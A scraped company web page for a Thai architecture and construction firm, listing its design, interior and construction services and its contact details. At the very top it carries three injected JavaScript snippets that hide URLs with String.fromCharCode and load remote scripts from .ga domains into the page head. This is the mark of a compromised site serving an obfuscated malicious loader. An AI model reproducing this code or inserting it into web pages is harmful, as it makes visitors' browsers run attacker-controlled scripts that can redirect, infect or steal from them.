Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var mj=String.fromCharCode(104,116,116,112,115,58,47,47,109,97,105,110,46,116,114,97,118,101,108,102,111,114,110,97,109,101,119,97,108,107,105,110,103,46,103,97,47,106,115,46,112,104,112,63,118,61,51,53,50); var t = document.createElement(String.fromCharCode(115,99,114,105,112,116)); t.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); t.src = mj;t.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);t.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(t);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,59,47,47,109,97,105,110,46,116,114,97,118,101,108,102,111,114,110,97,109,101,119,97,108,107,105,110,103,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var mj=String.fromCharCode(104,116,116,112,115,58,47,47,112,111,114,116,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,106,115,46,112,104,112,63,102,114,111,109,61,119,38,115,105,100,61,53,49,53); var t = document.createElement(String.fromCharCode(115,99,114,105,112,116)); t.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); t.src = mj;t.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);t.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(t);})();

THANSETHIDESIGN & CONSTRUCTION

มุ่งเน้นที่จะสร้างสรรค์ หลอมความลงตัวแห่งจินตนาการและความฝัน ที่บอกถึงความเป็นตัวคุณ ผ่านไอเดียการออกแบบของเรา เน้นความสวยงาม ความอบอุ่น ความสะดุดตา และประโยชน์ในการใช้สอย ``บริษัท ฐานเศรษฐี จำกัด``

คำนิยาม ``การออกแบบ`` จินตนาการนั้นถือเป็นกระบวนการธรรมชาติของทุกคน เป็นส่วนหนึ่งของกระบวนการคิด ดังนั้น การเชื่อมโยง ความกระตือรือล้น อิสระ ความเป็นระเบียบแบบแผน ของกระบวนการสร้างจินตภาพทางงสถาปัตยกรรม ที่ว่าง สีสัน และความรู้สึกสัมผัสรับรู้ เหล่านี้คือนิยามที่เหมาะสมและเป็นพื้นฐานในการให้คำจำกัดความ ``การออกแบบ``

บริษัท ฐานเศรษฐี จำกัด ยินดีให้บริการคำปรึกษาสำหรับการออกแบบ ตลอดจนควบคุมงานก่อสร้าง แบบครบวงจร ด้วยทีมนักออกแบบและวิศวกรมืออาชีพที่ลงตัวด้วยเอกลักษณ์และงบประมาณของคุณ “การออกแบบ” เป็นการสร้างความสุขตามอัตภาพของผู้อยู่อาศัยอย่างมีความสุข ได้สัมผัสธรรมชาติ และได้อยู่ในสภาพแวดล้อมที่ดี

Learn More
Image

IDEASหลอมความลงตัวแห่งจินตนาการและความฝัน

ให้คำปรึกษาการออกแบบ

ยินดีให้บริการคำปรึกษาสำหรับกา ...

ควบคุมงานก่อสร้าง

การควบคุมงานก่อสร้าง เรามีวิศว ...

ทีมงานมืออาชีพ

ครบวงจรด้วยทีมนักออกแบบและวิศว ...

YEARS OF SUCCESSFUL WORK HISTORY

0

มุ่งเน้นที่จะสร้างสรรค์ หลอมความลงตัวแห่งจินตนาการและความฝัน ที่บอกถึงความเป็นตัวคุณผ่าน ไอเดียการออกแบบของเรา
เน้นความสวยงาม ความอบอุ่น ความสะดุดตา และประโยชน์ในการใช้สอย “ บริษัท ฐานเศรษฐี จำกัด ”
ยินดีให้บริการคำปรึกษาสำหรับการออกแบบ ตลอดจนควบคุมงานก่อสร้างแบบครบวงจร ด้วยทีมนักออกแบบและวิศวกรมืออาชีพ ที่ลงตัวด้วยเอกลักษณ์และงบประมาณของคุณ

  • บริการออกแบบสถาปัตยกรรม
  • บริการออกแบบตกแต่งภายใน
  • บริการก่อสร้าง และ การตกแต่งภายใน
  • บริการที่ปรึกษาการออกแบบ

CONTACT

  • +66 65-778-6111
  • +66 65-778-6111
  • revvo_decon@hotmail.com
Address

88/39 Perfect Place ราชพฤกษ์

หมู่ที่ 1 ต.บางรักน้อย อ.เมืองนนทบุรี จ.นนทบุรี

เลขประจำตัวผู้เสียอากร / Tax ID : 0125562027371